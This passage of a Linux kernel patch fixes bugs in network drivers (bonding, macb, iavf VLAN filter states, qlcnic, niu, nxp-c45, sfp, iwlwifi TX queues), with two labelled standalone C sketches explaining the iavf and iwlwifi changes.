+ 			spin_lock(&ubi->wl_lock);
+ 			wl_entry_destroy(ubi, e);
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 45d3cb557de73..9f6824a6537bc 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -3266,7 +3266,8 @@ static int bond_na_rcv(const struct sk_buff *skb, struct bonding *bond,
+ 
+ 	combined = skb_header_pointer(skb, 0, sizeof(_combined), &_combined);
+ 	if (!combined || combined->ip6.nexthdr != NEXTHDR_ICMP ||
+-	    combined->icmp6.icmp6_type != NDISC_NEIGHBOUR_ADVERTISEMENT)
++	    (combined->icmp6.icmp6_type != NDISC_NEIGHBOUR_SOLICITATION &&
++	     combined->icmp6.icmp6_type != NDISC_NEIGHBOUR_ADVERTISEMENT))
+ 		goto out;
+ 
+ 	saddr = &combined->ip6.saddr;
+@@ -3288,7 +3289,7 @@ static int bond_na_rcv(const struct sk_buff *skb, struct bonding *bond,
+ 	else if (curr_active_slave &&
+ 		 time_after(slave_last_rx(bond, curr_active_slave),
+ 			    curr_active_slave->last_link_up))
+-		bond_validate_na(bond, slave, saddr, daddr);
++		bond_validate_na(bond, slave, daddr, saddr);
+ 	else if (curr_arp_slave &&
+ 		 bond_time_in_interval(bond, slave_last_tx(curr_arp_slave), 1))
+ 		bond_validate_na(bond, slave, saddr, daddr);
+diff --git a/drivers/net/ethernet/cadence/macb_main.c b/drivers/net/ethernet/cadence/macb_main.c
+index e255780f3867c..abd6cc0cd641f 100644
+--- a/drivers/net/ethernet/cadence/macb_main.c
++++ b/drivers/net/ethernet/cadence/macb_main.c
+@@ -1010,6 +1010,10 @@ static dma_addr_t macb_get_addr(struct macb *bp, struct macb_dma_desc *desc)
+ 	}
+ #endif
+ 	addr |= MACB_BF(RX_WADDR, MACB_BFEXT(RX_WADDR, desc->addr));
++#ifdef CONFIG_MACB_USE_HWSTAMP
++	if (bp->hw_dma_cap & HW_DMA_CAP_PTP)
++		addr &= ~GEM_BIT(DMA_RXVALID);
++#endif
+ 	return addr;
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf.h b/drivers/net/ethernet/intel/iavf/iavf.h
+index 2a9f1eeeb7015..93a998f169de7 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf.h
++++ b/drivers/net/ethernet/intel/iavf/iavf.h
+@@ -58,8 +58,6 @@ enum iavf_vsi_state_t {
+ struct iavf_vsi {
+ 	struct iavf_adapter *back;
+ 	struct net_device *netdev;
+-	unsigned long active_cvlans[BITS_TO_LONGS(VLAN_N_VID)];
+-	unsigned long active_svlans[BITS_TO_LONGS(VLAN_N_VID)];
+ 	u16 seid;
+ 	u16 id;
+ 	DECLARE_BITMAP(state, __IAVF_VSI_STATE_SIZE__);
+@@ -157,15 +155,20 @@ struct iavf_vlan {
+ 	u16 tpid;
+ };
+ 
++enum iavf_vlan_state_t {
++	IAVF_VLAN_INVALID,
++	IAVF_VLAN_ADD,		/* filter needs to be added */
++	IAVF_VLAN_IS_NEW,	/* filter is new, wait for PF answer */
++	IAVF_VLAN_ACTIVE,	/* filter is accepted by PF */
++	IAVF_VLAN_DISABLE,	/* filter needs to be deleted by PF, then marked INACTIVE */
++	IAVF_VLAN_INACTIVE,	/* filter is inactive, we are in IFF_DOWN */
++	IAVF_VLAN_REMOVE,	/* filter needs to be removed from list */
++};
++
+ struct iavf_vlan_filter {
+ 	struct list_head list;
+ 	struct iavf_vlan vlan;
+-	struct {
+-		u8 is_new_vlan:1;	/* filter is new, wait for PF answer */
+-		u8 remove:1;		/* filter needs to be removed */
+-		u8 add:1;		/* filter needs to be added */
+-		u8 padding:5;
+-	};
++	enum iavf_vlan_state_t state;
+ };
+ 
+ #define IAVF_MAX_TRAFFIC_CLASS	4
+@@ -257,6 +260,7 @@ struct iavf_adapter {
+ 	wait_queue_head_t vc_waitqueue;
+ 	struct iavf_q_vector *q_vectors;
+ 	struct list_head vlan_filter_list;
++	int num_vlan_filters;
+ 	struct list_head mac_filter_list;
+ 	struct mutex crit_lock;
+ 	struct mutex client_lock;
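[Standalone illustration, not part of the patch] The iavf rework above replaces the per-filter add/remove/is_new bitfields with one lifecycle enum, adding the DISABLE/INACTIVE states needed to park filters across an interface down/up cycle instead of tracking VIDs in separate bitmaps. A sketch of the ifup transition — the helper is hypothetical, though the state names mirror the ones defined above:

    #include <stdio.h>

    enum vlan_state {
        VLAN_ADD,       /* needs to be sent to the PF */
        VLAN_IS_NEW,    /* sent, waiting for the PF's answer */
        VLAN_ACTIVE,    /* accepted by the PF */
        VLAN_DISABLE,   /* delete from PF but keep in the list */
        VLAN_INACTIVE,  /* parked while the interface is down */
        VLAN_REMOVE,    /* delete from PF and drop from the list */
    };

    static const char *names[] = {
        "ADD", "IS_NEW", "ACTIVE", "DISABLE", "INACTIVE", "REMOVE",
    };

    /* What iavf_restore_filters() now does on ifup: only parked
     * filters are re-queued for the PF. */
    static enum vlan_state on_ifup(enum vlan_state s)
    {
        return s == VLAN_INACTIVE ? VLAN_ADD : s;
    }

    int main(void)
    {
        enum vlan_state filters[] = { VLAN_ACTIVE, VLAN_INACTIVE, VLAN_REMOVE };

        for (unsigned i = 0; i < sizeof(filters) / sizeof(filters[0]); i++)
            printf("filter %u: %s -> %s\n", i,
                   names[filters[i]], names[on_ifup(filters[i])]);
        return 0;
    }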
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 5f8fff6c701fc..34711a88dbaa0 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -791,7 +791,8 @@ iavf_vlan_filter *iavf_add_vlan(struct iavf_adapter *adapter,
+ 		f->vlan = vlan;
+ 
+ 		list_add_tail(&f->list, &adapter->vlan_filter_list);
+-		f->add = true;
++		f->state = IAVF_VLAN_ADD;
++		adapter->num_vlan_filters++;
+ 		adapter->aq_required |= IAVF_FLAG_AQ_ADD_VLAN_FILTER;
+ 	}
+ 
+@@ -813,7 +814,7 @@ static void iavf_del_vlan(struct iavf_adapter *adapter, struct iavf_vlan vlan)
+ 
+ 	f = iavf_find_vlan(adapter, vlan);
+ 	if (f) {
+-		f->remove = true;
++		f->state = IAVF_VLAN_REMOVE;
+ 		adapter->aq_required |= IAVF_FLAG_AQ_DEL_VLAN_FILTER;
+ 	}
+ 
+@@ -828,14 +829,18 @@ static void iavf_del_vlan(struct iavf_adapter *adapter, struct iavf_vlan vlan)
+  **/
+ static void iavf_restore_filters(struct iavf_adapter *adapter)
+ {
+-	u16 vid;
++	struct iavf_vlan_filter *f;
+ 
+ 	/* re-add all VLAN filters */
+-	for_each_set_bit(vid, adapter->vsi.active_cvlans, VLAN_N_VID)
+-		iavf_add_vlan(adapter, IAVF_VLAN(vid, ETH_P_8021Q));
++	spin_lock_bh(&adapter->mac_vlan_list_lock);
+ 
+-	for_each_set_bit(vid, adapter->vsi.active_svlans, VLAN_N_VID)
+-		iavf_add_vlan(adapter, IAVF_VLAN(vid, ETH_P_8021AD));
++	list_for_each_entry(f, &adapter->vlan_filter_list, list) {
++		if (f->state == IAVF_VLAN_INACTIVE)
++			f->state = IAVF_VLAN_ADD;
++	}
++
++	spin_unlock_bh(&adapter->mac_vlan_list_lock);
++	adapter->aq_required |= IAVF_FLAG_AQ_ADD_VLAN_FILTER;
+ }
+ 
+ /**
+@@ -844,8 +849,7 @@ static void iavf_restore_filters(struct iavf_adapter *adapter)
+  */
+ u16 iavf_get_num_vlans_added(struct iavf_adapter *adapter)
+ {
+-	return bitmap_weight(adapter->vsi.active_cvlans, VLAN_N_VID) +
+-		bitmap_weight(adapter->vsi.active_svlans, VLAN_N_VID);
++	return adapter->num_vlan_filters;
+ }
+ 
+ /**
+@@ -928,11 +932,6 @@ static int iavf_vlan_rx_kill_vid(struct net_device *netdev,
+ 		return 0;
+ 
+ 	iavf_del_vlan(adapter, IAVF_VLAN(vid, be16_to_cpu(proto)));
+-	if (proto == cpu_to_be16(ETH_P_8021Q))
+-		clear_bit(vid, adapter->vsi.active_cvlans);
+-	else
+-		clear_bit(vid, adapter->vsi.active_svlans);
+-
+ 	return 0;
+ }
+ 
+@@ -1293,16 +1292,11 @@ static void iavf_clear_mac_vlan_filters(struct iavf_adapter *adapter)
+ 		}
+ 	}
+ 
+-	/* remove all VLAN filters */
++	/* disable all VLAN filters */
+ 	list_for_each_entry_safe(vlf, vlftmp, &adapter->vlan_filter_list,
+-				 list) {
+-		if (vlf->add) {
+-			list_del(&vlf->list);
+-			kfree(vlf);
+-		} else {
+-			vlf->remove = true;
+-		}
+-	}
++				 list)
++		vlf->state = IAVF_VLAN_DISABLE;
++
+ 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
+ }
+ 
+@@ -2905,6 +2899,7 @@ static void iavf_disable_vf(struct iavf_adapter *adapter)
+ 		list_del(&fv->list);
+ 		kfree(fv);
+ 	}
++	adapter->num_vlan_filters = 0;
+ 
+ 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
+ 
+@@ -3122,9 +3117,6 @@ continue_reset:
+ 	adapter->aq_required |= IAVF_FLAG_AQ_ADD_CLOUD_FILTER;
+ 	iavf_misc_irq_enable(adapter);
+ 
+-	bitmap_clear(adapter->vsi.active_cvlans, 0, VLAN_N_VID);
+-	bitmap_clear(adapter->vsi.active_svlans, 0, VLAN_N_VID);
+-
+ 	mod_delayed_work(adapter->wq, &adapter->watchdog_task, 2);
+ 
+ 	/* We were running when the reset started, so we need to restore some
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+index 2c03ca01fdd9c..00dccdd290dce 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+@@ -642,16 +642,10 @@ static void iavf_vlan_add_reject(struct iavf_adapter *adapter)
+ 
+ 	spin_lock_bh(&adapter->mac_vlan_list_lock);
+ 	list_for_each_entry_safe(f, ftmp, &adapter->vlan_filter_list, list) {
+-		if (f->is_new_vlan) {
+-			if (f->vlan.tpid == ETH_P_8021Q)
+-				clear_bit(f->vlan.vid,
+-					  adapter->vsi.active_cvlans);
+-			else
+-				clear_bit(f->vlan.vid,
+-					  adapter->vsi.active_svlans);
+-
++		if (f->state == IAVF_VLAN_IS_NEW) {
+ 			list_del(&f->list);
+ 			kfree(f);
++			adapter->num_vlan_filters--;
+ 		}
+ 	}
+ 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
+@@ -679,7 +673,7 @@ void iavf_add_vlans(struct iavf_adapter *adapter)
+ 	spin_lock_bh(&adapter->mac_vlan_list_lock);
+ 
+ 	list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+-		if (f->add)
++		if (f->state == IAVF_VLAN_ADD)
+ 			count++;
+ 	}
+ 	if (!count || !VLAN_FILTERING_ALLOWED(adapter)) {
+@@ -710,11 +704,10 @@ void iavf_add_vlans(struct iavf_adapter *adapter)
+ 		vvfl->vsi_id = adapter->vsi_res->vsi_id;
+ 		vvfl->num_elements = count;
+ 		list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+-			if (f->add) {
++			if (f->state == IAVF_VLAN_ADD) {
+ 				vvfl->vlan_id[i] = f->vlan.vid;
+ 				i++;
+-				f->add = false;
+-				f->is_new_vlan = true;
++				f->state = IAVF_VLAN_IS_NEW;
+ 				if (i == count)
+ 					break;
+ 			}
+@@ -760,7 +753,7 @@ void iavf_add_vlans(struct iavf_adapter *adapter)
+ 		vvfl_v2->vport_id = adapter->vsi_res->vsi_id;
+ 		vvfl_v2->num_elements = count;
+ 		list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+-			if (f->add) {
++			if (f->state == IAVF_VLAN_ADD) {
+ 				struct virtchnl_vlan_supported_caps *filtering_support =
+ 					&adapter->vlan_v2_caps.filtering.filtering_support;
+ 				struct virtchnl_vlan *vlan;
+@@ -778,8 +771,7 @@ void iavf_add_vlans(struct iavf_adapter *adapter)
+ 				vlan->tpid = f->vlan.tpid;
+ 
+ 				i++;
+-				f->add = false;
+-				f->is_new_vlan = true;
++				f->state = IAVF_VLAN_IS_NEW;
+ 			}
+ 		}
+ 
+@@ -822,10 +814,16 @@ void iavf_del_vlans(struct iavf_adapter *adapter)
+ 		 * filters marked for removal to enable bailing out before
+ 		 * sending a virtchnl message
+ 		 */
+-		if (f->remove && !VLAN_FILTERING_ALLOWED(adapter)) {
++		if (f->state == IAVF_VLAN_REMOVE &&
++		    !VLAN_FILTERING_ALLOWED(adapter)) {
+ 			list_del(&f->list);
+ 			kfree(f);
+-		} else if (f->remove) {
++			adapter->num_vlan_filters--;
++		} else if (f->state == IAVF_VLAN_DISABLE &&
++		    !VLAN_FILTERING_ALLOWED(adapter)) {
++			f->state = IAVF_VLAN_INACTIVE;
++		} else if (f->state == IAVF_VLAN_REMOVE ||
++			   f->state == IAVF_VLAN_DISABLE) {
+ 			count++;
+ 		}
+ 	}
+@@ -857,11 +855,18 @@ void iavf_del_vlans(struct iavf_adapter *adapter)
+ 		vvfl->vsi_id = adapter->vsi_res->vsi_id;
+ 		vvfl->num_elements = count;
+ 		list_for_each_entry_safe(f, ftmp, &adapter->vlan_filter_list, list) {
+-			if (f->remove) {
++			if (f->state == IAVF_VLAN_DISABLE) {
+ 				vvfl->vlan_id[i] = f->vlan.vid;
++				f->state = IAVF_VLAN_INACTIVE;
+ 				i++;
++				if (i == count)
++					break;
++			} else if (f->state == IAVF_VLAN_REMOVE) {
++				vvfl->vlan_id[i] = f->vlan.vid;
+ 				list_del(&f->list);
+ 				kfree(f);
++				adapter->num_vlan_filters--;
++				i++;
+ 				if (i == count)
+ 					break;
+ 			}
+@@ -901,7 +906,8 @@ void iavf_del_vlans(struct iavf_adapter *adapter)
+ 		vvfl_v2->vport_id = adapter->vsi_res->vsi_id;
+ 		vvfl_v2->num_elements = count;
+ 		list_for_each_entry_safe(f, ftmp, &adapter->vlan_filter_list, list) {
+-			if (f->remove) {
++			if (f->state == IAVF_VLAN_DISABLE ||
++			    f->state == IAVF_VLAN_REMOVE) {
+ 				struct virtchnl_vlan_supported_caps *filtering_support =
+ 					&adapter->vlan_v2_caps.filtering.filtering_support;
+ 				struct virtchnl_vlan *vlan;
+@@ -915,8 +921,13 @@ void iavf_del_vlans(struct iavf_adapter *adapter)
+ 				vlan->tci = f->vlan.vid;
+ 				vlan->tpid = f->vlan.tpid;
+ 
+-				list_del(&f->list);
+-				kfree(f);
++				if (f->state == IAVF_VLAN_DISABLE) {
++					f->state = IAVF_VLAN_INACTIVE;
++				} else {
++					list_del(&f->list);
++					kfree(f);
++					adapter->num_vlan_filters--;
++				}
+ 				i++;
+ 				if (i == count)
+ 					break;
+@@ -2192,7 +2203,7 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 				list_for_each_entry(vlf,
+ 						    &adapter->vlan_filter_list,
+ 						    list)
+-					vlf->add = true;
++					vlf->state = IAVF_VLAN_ADD;
+ 
+ 				adapter->aq_required |=
+ 					IAVF_FLAG_AQ_ADD_VLAN_FILTER;
+@@ -2252,7 +2263,7 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 				list_for_each_entry(vlf,
+ 						    &adapter->vlan_filter_list,
+ 						    list)
+-					vlf->add = true;
++					vlf->state = IAVF_VLAN_ADD;
+ 
+ 				aq_required |= IAVF_FLAG_AQ_ADD_VLAN_FILTER;
+ 			}
+@@ -2436,15 +2447,8 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 
+ 		spin_lock_bh(&adapter->mac_vlan_list_lock);
+ 		list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+-			if (f->is_new_vlan) {
+-				f->is_new_vlan = false;
+-				if (f->vlan.tpid == ETH_P_8021Q)
+-					set_bit(f->vlan.vid,
+-						adapter->vsi.active_cvlans);
+-				else
+-					set_bit(f->vlan.vid,
+-						adapter->vsi.active_svlans);
+-			}
++			if (f->state == IAVF_VLAN_IS_NEW)
++				f->state = IAVF_VLAN_ACTIVE;
+ 		}
+ 		spin_unlock_bh(&adapter->mac_vlan_list_lock);
+ 		}
+diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_ctx.c b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_ctx.c
+index 87f76bac2e463..eb827b86ecae8 100644
+--- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_ctx.c
++++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_ctx.c
+@@ -628,7 +628,13 @@ int qlcnic_fw_create_ctx(struct qlcnic_adapter *dev)
+ 	int i, err, ring;
+ 
+ 	if (dev->flags & QLCNIC_NEED_FLR) {
+-		pci_reset_function(dev->pdev);
++		err = pci_reset_function(dev->pdev);
++		if (err) {
++			dev_err(&dev->pdev->dev,
++				"Adapter reset failed (%d). Please reboot\n",
++				err);
++			return err;
++		}
+ 		dev->flags &= ~QLCNIC_NEED_FLR;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/sun/niu.c b/drivers/net/ethernet/sun/niu.c
+index e6144d963eaaa..4bbf011d53e69 100644
+--- a/drivers/net/ethernet/sun/niu.c
++++ b/drivers/net/ethernet/sun/niu.c
+@@ -4522,7 +4522,7 @@ static int niu_alloc_channels(struct niu *np)
+ 
+ 		err = niu_rbr_fill(np, rp, GFP_KERNEL);
+ 		if (err)
+-			return err;
++			goto out_err;
+ 	}
+ 
+ 	tx_rings = kcalloc(num_tx_rings, sizeof(struct tx_ring_info),
+diff --git a/drivers/net/phy/nxp-c45-tja11xx.c b/drivers/net/phy/nxp-c45-tja11xx.c
+index 5813b07242ce1..029875a59ff89 100644
+--- a/drivers/net/phy/nxp-c45-tja11xx.c
++++ b/drivers/net/phy/nxp-c45-tja11xx.c
+@@ -191,7 +191,7 @@
+ #define MAX_ID_PS			2260U
+ #define DEFAULT_ID_PS			2000U
+ 
+-#define PPM_TO_SUBNS_INC(ppb)	div_u64(GENMASK(31, 0) * (ppb) * \
++#define PPM_TO_SUBNS_INC(ppb)	div_u64(GENMASK_ULL(31, 0) * (ppb) * \
+ 					PTP_CLK_PERIOD_100BT1, NSEC_PER_SEC)
+ 
+ #define NXP_C45_SKB_CB(skb)	((struct nxp_c45_skb_cb *)(skb)->cb)
+@@ -1337,6 +1337,17 @@ no_ptp_support:
+ 	return ret;
+ }
+ 
++static void nxp_c45_remove(struct phy_device *phydev)
++{
++	struct nxp_c45_phy *priv = phydev->priv;
++
++	if (priv->ptp_clock)
++		ptp_clock_unregister(priv->ptp_clock);
++
++	skb_queue_purge(&priv->tx_queue);
++	skb_queue_purge(&priv->rx_queue);
++}
++
+ static struct phy_driver nxp_c45_driver[] = {
+ 	{
+ 		PHY_ID_MATCH_MODEL(PHY_ID_TJA_1103),
+@@ -1359,6 +1370,7 @@ static struct phy_driver nxp_c45_driver[] = {
+ 		.set_loopback		= genphy_c45_loopback,
+ 		.get_sqi		= nxp_c45_get_sqi,
+ 		.get_sqi_max		= nxp_c45_get_sqi_max,
++		.remove			= nxp_c45_remove,
+ 	},
+ };
+ 
+diff --git a/drivers/net/phy/sfp.c b/drivers/net/phy/sfp.c
+index 40c9a64c5e301..5663a184644d5 100644
+--- a/drivers/net/phy/sfp.c
++++ b/drivers/net/phy/sfp.c
+@@ -212,6 +212,12 @@ static const enum gpiod_flags gpio_flags[] = {
+ #define SFP_PHY_ADDR		22
+ #define SFP_PHY_ADDR_ROLLBALL	17
+ 
++/* SFP_EEPROM_BLOCK_SIZE is the size of data chunk to read the EEPROM
++ * at a time. Some SFP modules and also some Linux I2C drivers do not like
++ * reads longer than 16 bytes.
++ */
++#define SFP_EEPROM_BLOCK_SIZE	16
++
+ struct sff_data {
+ 	unsigned int gpios;
+ 	bool (*module_supported)(const struct sfp_eeprom_id *id);
+@@ -1928,11 +1934,7 @@ static int sfp_sm_mod_probe(struct sfp *sfp, bool report)
+ 	u8 check;
+ 	int ret;
+ 
+-	/* Some SFP modules and also some Linux I2C drivers do not like reads
+-	 * longer than 16 bytes, so read the EEPROM in chunks of 16 bytes at
+-	 * a time.
+-	 */
+-	sfp->i2c_block_size = 16;
++	sfp->i2c_block_size = SFP_EEPROM_BLOCK_SIZE;
+ 
+ 	ret = sfp_read(sfp, false, 0, &id.base, sizeof(id.base));
+ 	if (ret < 0) {
+@@ -2615,6 +2617,7 @@ static struct sfp *sfp_alloc(struct device *dev)
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	sfp->dev = dev;
++	sfp->i2c_block_size = SFP_EEPROM_BLOCK_SIZE;
+ 
+ 	mutex_init(&sfp->sm_mutex);
+ 	mutex_init(&sfp->st_mutex);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+index 8464c9b7baf1f..a841268e0709f 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+@@ -729,7 +729,10 @@ void iwl_mvm_mac_itxq_xmit(struct ieee80211_hw *hw, struct ieee80211_txq *txq)
+ 
+ 	rcu_read_lock();
+ 	do {
+-		while (likely(!mvmtxq->stopped &&
++		while (likely(!test_bit(IWL_MVM_TXQ_STATE_STOP_FULL,
++					&mvmtxq->state) &&
++			      !test_bit(IWL_MVM_TXQ_STATE_STOP_REDIRECT,
++					&mvmtxq->state) &&
+ 			      !test_bit(IWL_MVM_STATUS_IN_D3, &mvm->status))) {
+ 			skb = ieee80211_tx_dequeue(hw, txq);
+ 
+@@ -754,42 +757,25 @@ static void iwl_mvm_mac_wake_tx_queue(struct ieee80211_hw *hw,
+ 	struct iwl_mvm *mvm = IWL_MAC80211_GET_MVM(hw);
+ 	struct iwl_mvm_txq *mvmtxq = iwl_mvm_txq_from_mac80211(txq);
+ 
+-	/*
+-	 * Please note that racing is handled very carefully here:
+-	 * mvmtxq->txq_id is updated during allocation, and mvmtxq->list is
+-	 * deleted afterwards.
+-	 * This means that if:
+-	 * mvmtxq->txq_id != INVALID_QUEUE && list_empty(&mvmtxq->list):
+-	 *	queue is allocated and we can TX.
+-	 * mvmtxq->txq_id != INVALID_QUEUE && !list_empty(&mvmtxq->list):
+-	 *	a race, should defer the frame.
+-	 * mvmtxq->txq_id == INVALID_QUEUE && list_empty(&mvmtxq->list):
+-	 *	need to allocate the queue and defer the frame.
+-	 * mvmtxq->txq_id == INVALID_QUEUE && !list_empty(&mvmtxq->list):
+-	 *	queue is already scheduled for allocation, no need to allocate,
+-	 *	should defer the frame.
+-	 */
+-
+-	/* If the queue is allocated TX and return. */
+-	if (!txq->sta || mvmtxq->txq_id != IWL_MVM_INVALID_QUEUE) {
+-		/*
+-		 * Check that list is empty to avoid a race where txq_id is
+-		 * already updated, but the queue allocation work wasn't
+-		 * finished
+-		 */
+-		if (unlikely(txq->sta && !list_empty(&mvmtxq->list)))
+-			return;
+-
++	if (likely(test_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state)) ||
++	    !txq->sta) {
+ 		iwl_mvm_mac_itxq_xmit(hw, txq);
+ 		return;
+ 	}
+ 
+-	/* The list is being deleted only after the queue is fully allocated. */
+-	if (!list_empty(&mvmtxq->list))
+-		return;
++	/* iwl_mvm_mac_itxq_xmit() will later be called by the worker
++	 * to handle any packets we leave on the txq now
++	 */
+ 
+-	list_add_tail(&mvmtxq->list, &mvm->add_stream_txqs);
+-	schedule_work(&mvm->add_stream_wk);
++	spin_lock_bh(&mvm->add_stream_lock);
++	/* The list is being deleted only after the queue is fully allocated. */
++	if (list_empty(&mvmtxq->list) &&
++	    /* recheck under lock */
++	    !test_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state)) {
++		list_add_tail(&mvmtxq->list, &mvm->add_stream_txqs);
++		schedule_work(&mvm->add_stream_wk);
++	}
++	spin_unlock_bh(&mvm->add_stream_lock);
+ }
+ 
+ #define CHECK_BA_TRIGGER(_mvm, _trig, _tid_bm, _tid, _fmt...)		\
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h b/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h
+index 1ccb3cad7cdc1..f5c921c41be56 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h
+@@ -729,7 +729,10 @@ struct iwl_mvm_txq {
+ 	struct list_head list;
+ 	u16 txq_id;
+ 	atomic_t tx_request;
+-	bool stopped;
++#define IWL_MVM_TXQ_STATE_STOP_FULL	0
++#define IWL_MVM_TXQ_STATE_STOP_REDIRECT	1
++#define IWL_MVM_TXQ_STATE_READY		2
++	unsigned long state;
+ };
+ 
+ static inline struct iwl_mvm_txq *
+@@ -827,6 +830,7 @@ struct iwl_mvm {
+ 		struct iwl_mvm_tvqm_txq_info tvqm_info[IWL_MAX_TVQM_QUEUES];
+ 	};
+ 	struct work_struct add_stream_wk; /* To add streams to queues */
++	spinlock_t add_stream_lock;
+ 
+ 	const char *nvm_file_name;
+ 	struct iwl_nvm_data *nvm_data;
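[Standalone illustration, not part of the patch] The mvm changes above replace the single bool "stopped" with independent atomic state bits, so a full-queue stop and a redirect stop can no longer clobber each other, and a READY bit (rechecked under add_stream_lock) closes the queue-allocation race. A sketch using C11 atomics in place of the kernel's set_bit/clear_bit/test_bit:

    #include <stdatomic.h>
    #include <stdio.h>

    enum { STOP_FULL = 1u << 0, STOP_REDIRECT = 1u << 1, READY = 1u << 2 };

    static atomic_uint state;

    static int can_xmit(void)
    {
        unsigned s = atomic_load(&state);
        return (s & READY) && !(s & (STOP_FULL | STOP_REDIRECT));
    }

    int main(void)
    {
        atomic_fetch_or(&state, READY);          /* queue allocated */
        atomic_fetch_or(&state, STOP_FULL);      /* queue filled up */
        atomic_fetch_or(&state, STOP_REDIRECT);  /* redirect started */
        atomic_fetch_and(&state, ~STOP_FULL);    /* space again... */
        printf("can xmit: %d\n", can_xmit());    /* 0: redirect still holds */
        atomic_fetch_and(&state, ~STOP_REDIRECT);
        printf("can xmit: %d\n", can_xmit());    /* 1 */
        return 0;
    }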
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+index 5b8e9a06f6d4a..994f597a7102a 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+@@ -1184,6 +1184,7 @@ iwl_op_mode_mvm_start(struct iwl_trans *trans, const struct iwl_cfg *cfg,
+ 	INIT_DELAYED_WORK(&mvm->scan_timeout_dwork, iwl_mvm_scan_timeout_wk);
+ 	INIT_WORK(&mvm->add_stream_wk, iwl_mvm_add_new_dqa_stream_wk);
+ 	INIT_LIST_HEAD(&mvm->add_stream_txqs);
++	spin_lock_init(&mvm->add_stream_lock);
+ 
+ 	init_waitqueue_head(&mvm->rx_sync_waitq);
+ 
+@@ -1680,7 +1681,10 @@ static void iwl_mvm_queue_state_change(struct iwl_op_mode *op_mode,
+ 
+ 		txq = sta->txq[tid];
+ 		mvmtxq = iwl_mvm_txq_from_mac80211(txq);
+-		mvmtxq->stopped = !start;
++		if (start)
++			clear_bit(IWL_MVM_TXQ_STATE_STOP_FULL, &mvmtxq->state);
++		else
++			set_bit(IWL_MVM_TXQ_STATE_STOP_FULL, &mvmtxq->state);
+ 
+ 		if (start && mvmsta->sta_state != IEEE80211_STA_NOTEXIST)
+ 			iwl_mvm_mac_itxq_xmit(mvm->hw, txq);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/sta.c b/drivers/net/wireless/intel/iwlwifi/mvm/sta.c
+index cbd8053a9e35a..013aca70c3d3b 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/sta.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/sta.c
+@@ -383,8 +383,11 @@ static int iwl_mvm_disable_txq(struct iwl_mvm *mvm, struct ieee80211_sta *sta,
+ 		struct iwl_mvm_txq *mvmtxq =
+ 			iwl_mvm_txq_from_tid(sta, tid);
+ 
+-		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
++		spin_lock_bh(&mvm->add_stream_lock);
+ 		list_del_init(&mvmtxq->list);
++		clear_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state);
++		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
++		spin_unlock_bh(&mvm->add_stream_lock);
+ 	}
+ 
+ 	/* Regardless if this is a reserved TXQ for a STA - mark it as false */
+@@ -478,8 +481,11 @@ static int iwl_mvm_remove_sta_queue_marking(struct iwl_mvm *mvm, int queue)
+ 			disable_agg_tids |= BIT(tid);
+ 		mvmsta->tid_data[tid].txq_id = IWL_MVM_INVALID_QUEUE;
+ 
+-		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
++		spin_lock_bh(&mvm->add_stream_lock);
+ 		list_del_init(&mvmtxq->list);
++		clear_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state);
++		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
++		spin_unlock_bh(&mvm->add_stream_lock);
+ 	}
+ 
+ 	mvmsta->tfd_queue_msk &= ~BIT(queue); /* Don't use this queue anymore */
+@@ -692,7 +698,7 @@ static int iwl_mvm_redirect_queue(struct iwl_mvm *mvm, int queue, int tid,
+ 			    queue, iwl_mvm_ac_to_tx_fifo[ac]);
+ 
+ 	/* Stop the queue and wait for it to empty */
+-	txq->stopped = true;
